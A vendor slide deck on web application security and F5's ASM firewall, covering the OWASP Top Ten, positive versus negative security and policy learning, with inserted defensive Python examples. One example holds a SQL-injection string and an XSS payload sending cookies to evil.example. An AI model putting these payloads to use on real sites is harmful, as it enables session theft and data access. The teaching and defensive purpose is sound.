Published by Maxence Picard. Modified over 6 years ago.
1
Web Application Security with the Application Security Manager (ASM)
Piotr Oleszkiewicz, Zbigniew Skurczynski

Speaker notes: We recognize that the biggest challenge for any security device is a deployment free of false positives. When we designed ASM this was a guiding principle. Several factors make deployment easy and smooth:
- ASM can be deployed gradually: start with a simple, low-granularity policy that provides high value from day one, then move to advanced, more granular policies that provide a higher level of protection.
- ASM can be loaded with a preconfigured security policy, which can then be customized with further application knowledge.
- ASM can run in transparent mode, logging what would have happened if the policy had been applied. It can also run in semi-transparent mode, where some violation categories are in blocking mode and others are not. For example, it is easy to turn on blocking for categories such as "Non-RFC request", "Illegal HTTP response code" (raised when the application throws an error) and "Illegal file type".
2
Agenda
- Web Security – What are the problems?
- Vulnerabilities and protection strategies
- Web security with a Web Application Firewall (WAF)
- Security Policy Setups
- About us
3
Application Security: Trends and Drivers
- "Webification" of applications
- Intelligent browsers and applications
- Public awareness of data security
- Increasing regulatory requirements
- The next attackable frontier
- Targeted attacks

Speaker notes: Let's start with trends. Many applications today use HTTP to exchange information. These can be legacy client-server applications in which the client is replaced by a web front end, or new applications that take advantage of platforms and browsers offering fast development, a good user experience and accessibility from many devices. On the other hand, as more data is exposed, the public using these web applications is becoming more suspicious about the security of that accessibility. This leads governments and other organizations to enforce standards in which security is a key aspect: HIPAA, PCI, SOX. The TCP stack and the 100% deployment of network firewalls pushed the hacker community up the OSI model to layer 7; today hackers attack the web application itself. We also see a new trend, targeted attacks: the revolution that passed over the dot-com industry is happening today in the security market. If in the past a successful attack meant a worm that infected millions of web servers within hours, or defacing yahoo.com, today a successful attack is carried out under the surface, where no one can track it or be alerted, and there is money behind it. Criminal organizations are hiring the best hackers.
4
The weakest link
Diagram: the defensive layers (network firewall, antivirus, host IDS and secure OS, network IDS/IPS) sit in front of network access, the computer and the system; the applications standing in front of the data are the weakest link.
"64% of the 10 million security incidents tracked targeted port 80." (Information Week magazine)
5
Why Are Web Applications Vulnerable?
- Security officers are not involved in software development, while developers are not security conscious
- New code is written to a best-practice methodology but not tested properly
- New types of attack are not covered by the current methodology
- New code is written in a hurry because of business pressures
- Code is written by third parties: badly documented, poorly tested, and the third party is no longer available
- Flaws in third-party infrastructure elements
- Session-less web applications written with a client-server mentality
6
Most web applications are vulnerable!
- "70% of websites at immediate risk of being hacked!" – Acunetix, Jan
- "8 out of 10 websites vulnerable to attack" – WhiteHat, "Security Report", Nov 2006
- "75 percent of hacks happen at the application." – Gartner, "Security at the Application Level"
- "64 percent of developers are not confident in their ability to write secure applications." – Microsoft Developer Research
- "The battle between hackers and security professionals has moved from the network layer to the Web applications themselves." – Network World
7
www.owasp.org Top Ten Project (OWASP Top Ten 2007)
- A1 – Cross Site Scripting (XSS): XSS flaws occur whenever an application takes user-supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser, which can hijack user sessions, deface web sites, etc.
- A2 – Injection Flaws: Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.
- A3 – Insecure Remote File Include: Code vulnerable to remote file inclusion allows attackers to include hostile code and data, resulting in devastating attacks such as total server compromise.
- A4 – Insecure Direct Object Reference: A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.
- A5 – Cross Site Request Forgery (CSRF): A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then performs a hostile action to the benefit of the attacker.
- A6 – Information Leakage and Improper Error Handling: Applications can unintentionally leak information about their configuration or internal workings, or violate privacy, through a variety of application problems. Attackers use this weakness to violate privacy or to conduct further attacks.
- A7 – Broken Authentication and Session Management: Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys or authentication tokens to assume other users' identities.
- A8 – Insecure Cryptographic Storage: Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.
- A9 – Insecure Communications: Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications.
- A10 – Failure to Restrict URL Access: Frequently, the only protection for sensitive areas of an application is that links or URLs are not presented to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations.
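A1 and A2 from the list above, as an added example that is not part of the original presentation: a login lookup built by string concatenation next to its parameterized form, and a greeting page that reflects input raw next to one that HTML-encodes it. The in-memory user table, the account name and the two payloads are constructed for the demonstration.

```python
"""Injection (A2) and XSS (A1): vulnerable form beside hardened form.
Added example; the database, user and payloads are constructed."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed in-memory user table for the demonstration.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> bool:
    # Hostile data becomes part of the SQL text: the interpreter cannot
    # tell attacker-supplied quotes from the developer's own syntax.
    query = ("SELECT 1 FROM users WHERE name = '" + name +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_hardened(conn: sqlite3.Connection, name: str, password: str) -> bool:
    # Parameterized query: values are bound by the driver and never parsed
    # as SQL, so the same payload is just a (wrong) literal string.
    query = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone() is not None


def greet_vulnerable(name: str) -> str:
    # User-supplied data sent to the browser without encoding (A1).
    return "<p>Hello " + name + "</p>"


def greet_hardened(name: str) -> str:
    # Encode on output: "<script>" becomes "&lt;script&gt;" and is
    # rendered as text rather than executed.
    return "<p>Hello " + html.escape(name, quote=True) + "</p>"


# Constructed payloads: a tautology for SQL injection and a cookie-stealing
# script tag for XSS.
SQLI_PAYLOAD = "' OR '1'='1"
XSS_PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    db = make_db()
    # The vulnerable query becomes:
    #   ... WHERE name = 'alice' AND password = '' OR '1'='1'
    # AND binds tighter than OR, so the OR '1'='1' matches every row.
    print("vulnerable login bypassed:", login_vulnerable(db, "alice", SQLI_PAYLOAD))
    print("hardened login bypassed:  ", login_hardened(db, "alice", SQLI_PAYLOAD))
    print(greet_vulnerable(XSS_PAYLOAD))
    print(greet_hardened(XSS_PAYLOAD))
```

The hardened login still accepts the real password; only the path by which attacker text reaches the SQL parser or the HTML parser changes.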
8
Problems are growing
Yesterday:
- Tens of working hours of the best security specialists
- Preparing a successful attack on a web application was very expensive, but it could still bring a profit if the target was interesting enough
Today:
- Automatic and semi-automatic tools that are user friendly
- Fuzzers (more than 20 open-source tools alone)
- Newest trend: evolutionary programming
Bottom line: the cost of preparing a successful attack has fallen dramatically!
9
Most web applications are vulnerable!
Practical demonstration:
- Google
- Weak application logic
- A web browser is the only tool we need
10
Not enough time! The time from finding a vulnerability to launching an attack is falling. Are your applications prepared for zero-day attacks?
11
Web Application Security
Diagram: attacks now look to exploit application vulnerabilities. Perimeter security is strong ("going back to the castle"), but it is open to web traffic on port 80 and port 443. Attacks that pass through: buffer overflow, cross-site scripting, SQL/OS injection, cookie poisoning, hidden-field manipulation, parameter tampering. Consequences: non-compliant information, forced access to information, infrastructural intelligence. High information density = high-value attack.
12
Web Application Security with ASM
Diagram: ASM sits between the browser and the application. It stops bad requests and responses (unauthorised access, non-compliant information, infrastructural intelligence) and allows legitimate requests through.
13
Traditional Security Devices vs. Web Application Firewall (ASM)
Table (flattened on the slide): coverage of a network firewall, an IPS and ASM against known web worms, unknown web worms, known web vulnerabilities, unknown web vulnerabilities, illegal access to web-server files, forceful browsing, file/directory enumeration, buffer overflow, cross-site scripting, SQL/OS injection, cookie poisoning, hidden-field manipulation and parameter tampering. As the slide presents it, the network firewall column is marked X (no protection), the IPS column "limited" or "partial", and ASM covers the list.

Speaker notes: These are the names of the attacks people generally refer to when they talk about application security. Note that it is all just jargon; everyone has the same list and will claim they can prevent it all. The real question is: how do they prevent it, and can they really prevent these things from happening in real life, in the ways your applications are vulnerable? Let me give you a small example…
14
Security Policy in ASM
Diagram: the browser reaches the application through ASM, which enforces a definition of good and bad behaviour on the way in and performs content scrubbing and application cloaking on the way out.
15
Security Policy in ASM
- Can be generated automatically or manually
- Highly granular in configuration and blocking
- Easy to understand and manage
- Bi-directional: inbound, protection from generalised and targeted attacks; outbound, content scrubbing and application cloaking
- Application content and context aware
16
Positive Security - Example
17
Positive Security - Example
Actions not known to be legal can now be blocked:
- Wrong page order
- Invalid parameter
- Invalid value (for example a <script> tag inside a parameter value)
- etc.
18
Negative vs. Positive Security

Why is an application firewall able to block a broader range of attacks, and do it proactively? The answer lies in the positive security model.

Traditional network security fails to adequately secure application traffic because it relies on signatures. Using a bouncer as an analogy, this is like telling him to block people who exhibit known bad attributes: backwards baseball caps, gang colours, guns, and so on. The problem with this approach is that the list must constantly grow to account for all the known bad in the world. Every time a new attack or bad behaviour is discovered the list must be extended. This approach is always reactive and always follows the discovery of attacks.

The alternative is to equip the same bouncer with a guest list: only the people on the list are let in. This is positive security. Positive security learns the application itself and establishes a policy of known-good behaviour; only what is marked as good behaviour is allowed in. This list is much shorter and does not need to grow unless the application changes. Because it does not depend on a signature existing, it can stop zero-day attacks that nobody has described yet, as long as the attack falls outside the learned good behaviour.

In addition to positive security, TrafficShield is also stateful. If a user tries to enter the application by changing an identifier in the request, the device recognizes the change and blocks access. Once authentication has taken place, the positive security model ensures that no user is able to change their user credentials.
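The contrast between the two models, as an added example that is not part of the original presentation and not ASM's own implementation: a short signature list stands in for the negative model, and a hand-written allowlist of legal objects, parameters and value patterns stands in for the positive model. It also shows the semi-transparent mode from the opening notes, where only some violation categories block while the rest are logged. The policy, the category names and the four requests are constructed for illustration.

```python
"""Negative (signature) versus positive (allowlist) security.
Added example with a constructed policy and constructed requests."""
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, urlsplit

# Negative model: a tiny signature list standing in for an IPS.
SIGNATURES = [
    re.compile(r"<script", re.I),
    re.compile(r"'\s*or\s+'1'\s*=\s*'1", re.I),
]


def negative_check(url: str) -> list:
    """Return one 'signature' entry per signature that matches the URL."""
    return ["signature" for s in SIGNATURES if s.search(url)]


# Positive model: only what the policy describes as legal is allowed.
@dataclass
class Policy:
    # object path -> {parameter name -> regex every legal value must fully match}
    objects: dict
    # violation categories that block; every other category is only logged
    # (the semi-transparent mode described in the speaker notes)
    blocking: set = field(default_factory=set)


POLICY = Policy(
    objects={
        "/login": {"user": re.compile(r"[a-z0-9_]{3,16}"),
                   "pass": re.compile(r".{8,64}")},
        "/account": {"id": re.compile(r"\d{1,8}")},
    },
    # During roll-out, unknown parameters are logged but not yet blocked.
    blocking={"illegal_object", "illegal_value"},
)


def positive_check(policy: Policy, url: str) -> list:
    """Return the violation categories a request raises against the allowlist."""
    parts = urlsplit(url)
    params = policy.objects.get(parts.path)
    if params is None:
        return ["illegal_object"]          # object the policy never listed
    violations = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        pattern = params.get(name)
        if pattern is None:
            violations.append("illegal_parameter")
        elif not pattern.fullmatch(value):
            violations.append("illegal_value")
    return violations


def decide(policy: Policy, url: str) -> str:
    """'block' if an enforced category fired, 'log' if only logged ones did, else 'allow'."""
    found = positive_check(policy, url)
    if any(v in policy.blocking for v in found):
        return "block"
    return "log" if found else "allow"


# Constructed requests: a legitimate login; an injection variant without
# quotes, which no signature above describes; a request carrying an extra
# parameter; and forceful browsing to an object the policy never saw.
REQUESTS = [
    "/login?user=alice&pass=correcthorse",
    "/account?id=7%20UNION%20SELECT%20password%20FROM%20users",
    "/login?user=alice&pass=correcthorse&debug=1",
    "/admin/backup.php",
]

if __name__ == "__main__":
    for url in REQUESTS:
        print(f"{url!r:60} negative={negative_check(url)} positive={decide(POLICY, url)}")
```

The second request is the point of the slide: the signature list finds nothing, but the allowlist rejects it because `id` is not a short integer. The third shows why a staged roll-out matters: the unexpected `debug` parameter is recorded, not blocked, until the policy has been tightened.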
19
Protection for Dynamic Values or Hidden Field Manipulation
20
Selective Application Flow Enforcement
Diagram: a login form (Username, Password) leads to a Transfer form (From Acc., To Acc., $ Amount). Following the flow is ALLOWED; reaching the transfer form directly, or posting it out of order, is a VIOLATION. This part of the site is a financial transaction that requires authentication, so here we should enforce strict flow and parameter validation. But should every out-of-order request be a violation? The user may simply have bookmarked the page. Enforcing flow where it is not needed leads to false positives.
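The two preceding slides, hidden-field (dynamic value) protection and selective flow enforcement, as one added example that is not part of the original presentation and not ASM's own code. It models the behaviour the slides describe: the device reads the values the server put into hidden fields of the transfer form, remembers them per session, and on the submission checks both that the form was served first (flow) and that the hidden values are unchanged. Flow is enforced only for the transfer object, so a bookmarked request for an ordinary page is not a violation. The form, the paths, the session identifiers and the account numbers are constructed.

```python
"""Dynamic hidden-field protection plus selective flow enforcement.
Added example; page contents, paths and sessions are constructed."""
from html.parser import HTMLParser


class HiddenFieldParser(HTMLParser):
    """Collect the name/value pairs of <input type="hidden"> in a response."""
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.fields[a.get("name", "")] = a.get("value", "")


def extract_hidden_fields(html_body: str) -> dict:
    p = HiddenFieldParser()
    p.feed(html_body)
    return p.fields


# Objects whose flow and dynamic values are enforced: submission path ->
# the object that must have been served to the same session just before.
# Every other object (news, help, ...) may be bookmarked freely.
FLOW_ENFORCED = {"/transfer": "/transfer_form"}


class FlowEnforcer:
    def __init__(self):
        # session id -> {"last_object": path, "hidden": {name: server value}}
        self.sessions = {}

    def observe_response(self, session_id: str, path: str, body: str) -> None:
        """Record the object the server just served and, for a protected
        form, the hidden values the server chose for this session."""
        state = self.sessions.setdefault(session_id, {"last_object": None, "hidden": {}})
        state["last_object"] = path
        if path in FLOW_ENFORCED.values():
            state["hidden"] = extract_hidden_fields(body)

    def check_request(self, session_id: str, path: str, params: dict) -> list:
        """Return violation names for a request; an empty list means allowed."""
        required_previous = FLOW_ENFORCED.get(path)
        if required_previous is None:
            return []   # ordinary page: a bookmark or direct link is fine
        state = self.sessions.get(session_id, {"last_object": None, "hidden": {}})
        violations = []
        if state["last_object"] != required_previous:
            violations.append("illegal_flow")
        for name, server_value in state["hidden"].items():
            if params.get(name) != server_value:
                violations.append("modified_dynamic_value:" + name)
        return violations


# Constructed transfer form as the application would send it; from_acc and
# fee are decided by the server and must come back unchanged.
TRANSFER_FORM = """
<form action="/transfer" method="post">
  <input type="hidden" name="from_acc" value="ACC-1001">
  <input type="hidden" name="fee" value="2.50">
  To account: <input name="to_acc"> Amount: <input name="amount">
  <input type="submit" value="Transfer">
</form>"""

if __name__ == "__main__":
    asm = FlowEnforcer()
    asm.observe_response("s1", "/transfer_form", TRANSFER_FORM)
    good = {"from_acc": "ACC-1001", "fee": "2.50", "to_acc": "ACC-2002", "amount": "100"}
    tampered = dict(good, fee="0.00")
    print("in order, unchanged:", asm.check_request("s1", "/transfer", good))
    print("fee edited in browser:", asm.check_request("s1", "/transfer", tampered))
    print("posted without loading the form:", asm.check_request("s2", "/transfer", good))
    print("bookmarked news page:", asm.check_request("s2", "/news", {}))
```

Only the transfer path is in `FLOW_ENFORCED`, which is the "selective" part: the false positive the slide warns about (a bookmarked page) never becomes a violation because flow is not checked for unprotected objects.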
21
Flexible Policy Granularity
Generic policies (policy per object type):
- Low number of policies
- Quick to implement
- Requires little change management
- Cannot take application flow into account
Specific policies (policy per object):
- High number of policies
- More time to implement
- Requires a change-management policy
- Can enforce application flow
- Tightest possible security
- Protects dynamic values
The optimum policy is often a hybrid.
22
Flexible Deployment Options
Diagram: policy-building tools ("trusted IP" learning, live traffic learning, crawler, negative RegEx template) feed policy tightening suggestions. The typical standard starting point covers object types and object names; tightening then adds parameter names, parameter values and object flows, each step giving a tighter security posture.

Speaker notes: TrafficShield offers flexible deployment options to provide the security posture demanded by your business requirements. Our standard implementation can be done in as little as one day, providing protection from the most common application attacks and locking down particular objects or directories that are at risk. TrafficShield's "learning" mechanism uses a suite of tools to suggest a tighter security policy, allowing customers to increase their security posture only when they are confident that the policy is accurate enough to support it.
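Learning from trusted traffic, as an added example that is not part of the original presentation and not ASM's learning engine: requests seen from a trusted address are turned into tightening suggestions at the four granularities in the order the slide shows (object types, object names, parameter names, parameter value patterns), while traffic from any other address is ignored so that an attacker cannot teach the policy. The access-log lines, the trusted address and the three value-classification rules are constructed; a real learning engine is considerably more elaborate.

```python
"""Policy tightening suggestions learned from trusted traffic.
Added example; the log lines and trusted address are constructed."""
import os
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log style lines: client_ip method url
TRUSTED_TRAFFIC = """\
10.0.0.5 GET /index.html
10.0.0.5 GET /login.php?user=alice
10.0.0.5 POST /login.php?user=alice&pass=correcthorse
10.0.0.5 GET /account.php?id=1001
10.0.0.5 GET /account.php?id=1002
10.0.0.5 GET /images/logo.gif
203.0.113.9 GET /account.php?id=1%20OR%201=1
"""

TRUSTED_IPS = {"10.0.0.5"}


def classify(values) -> str:
    """Suggest the tightest of three value patterns that every observed
    value satisfies: digits only, then word characters, then free text
    without HTML or quote characters. Length is capped at the longest seen."""
    longest = max(len(v) for v in values)
    if all(v.isdigit() for v in values):
        return r"^\d{1,%d}$" % longest
    if all(re.fullmatch(r"[A-Za-z0-9_]+", v) for v in values):
        return r"^[A-Za-z0-9_]{1,%d}$" % longest
    return r"^[^<>'\"]{1,%d}$" % longest


def learn(log_text: str, trusted_ips: set) -> dict:
    """Return tightening suggestions at the four granularities of the slide."""
    object_types, object_names = set(), set()
    param_names = defaultdict(set)
    param_values = defaultdict(lambda: defaultdict(list))
    for line in log_text.splitlines():
        ip, _method, url = line.split()
        if ip not in trusted_ips:
            continue                      # untrusted traffic never shapes the policy
        parts = urlsplit(url)
        object_types.add(os.path.splitext(parts.path)[1] or "(none)")
        object_names.add(parts.path)
        for name, value in parse_qsl(parts.query):
            param_names[parts.path].add(name)
            param_values[parts.path][name].append(value)
    return {
        "object_types": sorted(object_types),
        "object_names": sorted(object_names),
        "parameter_names": {p: sorted(n) for p, n in param_names.items()},
        "parameter_values": {p: {n: classify(v) for n, v in names.items()}
                             for p, names in param_values.items()},
    }


if __name__ == "__main__":
    for level, suggestion in learn(TRUSTED_TRAFFIC, TRUSTED_IPS).items():
        print(level, "->", suggestion)
```

Each level of the result is a candidate for the next tightening step; an operator accepts the object types first, then names, then parameters, which mirrors the staged posture the slide draws. The untrusted line carrying `1 OR 1=1` leaves no trace in the suggestions.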
23
F5 is the Global Leader in Application Delivery Networking
Diagram: users (at home, in the office, on the road) reach applications (Oracle, Siebel, SAP) in the data centre across the Application Delivery Network. Business goal: achieve these objectives in the most operationally efficient manner.

Speaker notes: Basic point: the network does not exist for its own sake; it exists solely to support the applications running on top of it. As a network company, what can we do to make those applications run better, meaning faster, more secure and more available? Everything comes down to these three issues: xxx. I think nobody will dispute that ???? Looking at any of these topics, issues or problems in isolation fails, because ... what if I xxx. This is our unique value proposition: performance, functionality, unique integration.
24
F5's Comprehensive Single Solution
Diagram: users on mobile phones, PDAs, laptops and desktops reach applications (CRM, database, Siebel, BEA, legacy, .NET, SAP, PeopleSoft, IBM, ERP, SFA, custom) through the F5 Application Delivery Network, built on TMOS, including co-location.

Speaker notes: Message: if you do not address this issue effectively with the big picture in mind, you are setting yourself up for failure down the road. There is incredible demand for applications: not only more applications but more ways to reach them. In trying to satisfy these demands, enterprises take short-sighted approaches. As a result, networks become increasingly complex and the problem just gets worse.
25
The F5 Products & Modules
Diagram: the international data centre with BIG-IP Global Traffic Manager, BIG-IP Link Controller, WANJet, BIG-IP Local Traffic Manager, BIG-IP Web Accelerator, FirePass, BIG-IP Application Security Manager and Enterprise Manager, all on TMOS with iControl & iRules. Protocols handled: HTTP/HTML, SIP, RTP, SRTP, RTCP, SMTP, FTP, SFTP, RTSP, SQL, CIFS, MAPI, IIOP, SOAP, XML etc. Application partners: Microsoft, SAP, Oracle, IBM, BEA.
26
Unique TMOS Architecture
Diagram: a full proxy between client side and server side on a high-performance networking microkernel, with TCP Express on both sides and traffic plug-ins: ASM/TrafficShield, Web Accelerator, third party, TCP proxy, rate shaping, SSL, caching, XML, compression, OneConnect. Around it: iRules (network programming language), the iControl API (external monitoring and control), high-performance hardware, powerful application protocol support.

Speaker notes (engineering remarks left in the slide): 68: they want BIG-IP to rewrite the URL based on the destination node selected by the load-balancing algorithms. This may be a fairly small number of code lines to change, but the number of corner cases (e.g. dropped-packet recovery, combining with other features, UI) is huge. This needs to work "in the real world". It would be a lot easier to do in HSIBJ. 86: two parts to this: first, the ability to use the known protocol to know when to separate each request; second, to implement that in a OneConnect-like way, so that the many requests from the one connection are load balanced properly to their respective servers. 98: BIG-IP won't work because the initial handshake needs to occur before the client tells the BIG-IP what it is looking for.
27
BIG-IP Software Add-On Modules Quickly Adapt to Changing Application & Business Challenges
- Compression Module: increase performance
- Fast Cache Module: offload servers
- Rate Shaping Module: reserve bandwidth
28
BIG-IP Security Add-On Modules
- Application Security Module: protect applications and data
- SSL Acceleration: protect data over the Internet
- Advanced Client Authentication Module: protect against unauthorised access
29
ASM Platform Availability
- Standalone ASM on the TMOS 4100
- Available as a module with BIG-IP LTM 6400/6800 and 8400/8800

Speaker notes: On BIG-IP LTM or GTM, ASM is available just by a licence upgrade; once you have that licence, you simply route the traffic of specific VIPs into ASM. The difference between standalone ASM and the ASM module is that the standalone unit cannot load balance pool members.
30
Analyst Leadership Position
Figure: Gartner Magic Quadrant for Application Delivery Products, 2007 (axes: Ability to Execute, Completeness of Vision; quadrants: Challengers, Leaders, Visionaries, Niche Players), highlighting F5 Networks' leadership position. Other vendors shown: Citrix Systems, Cisco Systems, Akamai Technologies, Foundry Networks, Crescendo, Nortel Networks, Radware, Juniper, Coyote Point, Zeus, NetContinuum, Array Networks. Source: Gartner, January 2007.
F5 strengths:
- Offers the most feature-rich AP ADC, combined with excellent performance and programmability via iRules and a broad product line.
- Strong focus on applications, including long-term relationships with major application vendors such as Microsoft, Oracle and SAP.
- Strong balance sheet and a cohesive management team with a solid track record of delivering the right products at the right time.
- Strong underlying platform allows easy extensibility to add features.
- Support of an increasingly loyal and large group of active developers tuning their application environments specifically for F5 infrastructure.
31
F5 Customers in EMEA (1 of 2)
Banking, Financial Insurance, Investments Telco, Service Providers, Mobile
32
F5 Customers in EMEA (2 of 2)
Transport, Travel Media, Technology, Online Manufact., Energy Governm., Other Health, Consumer
33
Summary
- Protecting web applications is a challenge within many organizations, yet attacks against web applications are the hackers' favourites
- ASM provides easy and very granular configuration options to protect web applications and to eliminate false positives
- ASM combines positive and negative security models to achieve optimum security
- ASM is an integrated solution and can run as a module on BIG-IP or standalone
- ASM is used to help meet compliance with various standards
- ASM provides hidden-parameter protection and selective flow control enforcement
- ASM provides an additional security layer or can be used as the central point for web application security enforcement
34
Evaluation
The best way to see how ASM will perform is in your environment with your applications. Soft-Tronik can provide you with evaluation hardware and engineers to help with deployment.
36
Backup Slides
37
Company Snapshot Facts Position References
38
F5's Continued Success
Revenue chart (not reproduced). Headquartered in Seattle, WA.
F5 ensures applications running over the network are always secure, fast, and available.
- Founded 1996 / public 1999
- Over 10,000 customers and 30,000 systems installed
- Over 1,100 employees
- NASDAQ: FFIV